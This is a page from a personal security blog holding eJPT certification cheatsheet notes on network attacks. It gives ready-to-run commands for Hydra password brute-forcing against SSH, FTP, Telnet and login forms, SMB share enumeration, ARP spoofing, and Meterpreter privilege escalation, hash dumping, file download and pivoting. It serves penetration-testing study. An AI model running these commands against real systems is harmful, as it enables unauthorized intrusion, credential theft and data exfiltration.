Kaiser784's Blog
  • whoami
  • Ingress
  • 90 Day High Frequency
    • Log-1
    • Log-2
    • Log-3
    • Conclusion
  • Making a Boot2root machine with docker
  • Adversarial ML
    • Practical Defenses against Adversarial ML
  • Certifications
    • eJPT
      • Cheatsheet/Notes
        • Enumeration
        • Web Attacks
        • System Attacks
        • Network Attacks
    • Dante ProLabs (HackTheBox)
  • Writeups
    • Google InternetCTF writeup
    • Lakera Gandalf LLM Security
    • OSPG Writeups
    • Matrix - AI Security Challenge by Repello writeup
    • WithSecure AI Challenge - My LLM Doctor writeup
    • WIZ Security Challenges
      • The BIG IAM Challenge writeup
      • K8S LAN Party Writeup
      • EKS Cluster Games Writeup
      • Prompt Airlines Writeup
  • Misc
    • Paul Kadali
    • Redirection
Powered by GitBook
On this page
  • Hydra
  • SSH
  • Telnet
  • FTP
  • POST form login
  • Shares
  • Shares Enumeration
  • List Shares
  • Mount Share
  • enum4linux
  • ARP Poisoning
  • arpspoof
  • Metasploit
  • Basic
  • Meterpreter
  • Routing in Metasploit

Was this helpful?

  1. Certifications
  2. eJPT
  3. Cheatsheet/Notes

Network Attacks

SSH, Telnet, RDP, HTTP auth, Windows shares

Hydra

SSH

hydra -L users.txt -P pass.txt 10 10.10.10.10 ssh

Telnet

hydra -L users.txt -P pass.txt telnet://10.10.10.10

FTP

hydra -L users.txt -P pass.txt ftp://10.10.10.10

POST form login

hydra 10.10.10.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:statement for incorrect login" -L /usr/share/ncrack/minimal.usr -P /etc/john/rockyou.txt

Add-f to stop the brute-forcing after finding one valid cred.

  • /etc/john/rockyou.txt for passwords.

  • /usr/share/ncrack/minimal.usr for users.

  • Sometimes you can just use the users list for the passwords too.

Shares

Shares Enumeration

nmblookup -A 10.10.10.10

List Shares

smbclient -L //10.10.10.10 -N

Mount Share

smbclient //10.10.10.10/sharename -N

enum4linux

enum4linux -a 10.10.10.10

The above command does all the previous ones and gives you more data too except mounting the shares, which you have to implement using smbclient.

ARP Poisoning

arpspoof

<interface> == eth0/tap0

arpspoof -i <interface> -t target -r host

Metasploit

Basic

search <term>
use <term>
info
show options
set <option> x
exploit

Meterpreter

bind_tcp: runs a server process on the target machine that waits for connections from the attacker machine.

reverse_tcp: performs a TCP connection back to the attacker machine. Helps evade firewall rules.

background #backgrounds the current session
sessions -l
sessions -i %n
sysinfo
ifconfig, route
getuid
getsystem #windows privesc
bypassuac #if windows privesc fails
hashdump
cat '/path/to/file.txt'
download '/path/to/fileontarget.txt' /root/mymachine/

Routing in Metasploit

Background the meterpreter of the session where you found the other subnet accessible.

use post/multi/manage/autoroute
route add <subnet> <session-id>

You have to input the session id of the meterpreter session.

Now the subnet is accessible in the whole of Metasploit-Framework.

PreviousSystem AttacksNextDante ProLabs (HackTheBox)

Last updated 3 years ago

Was this helpful?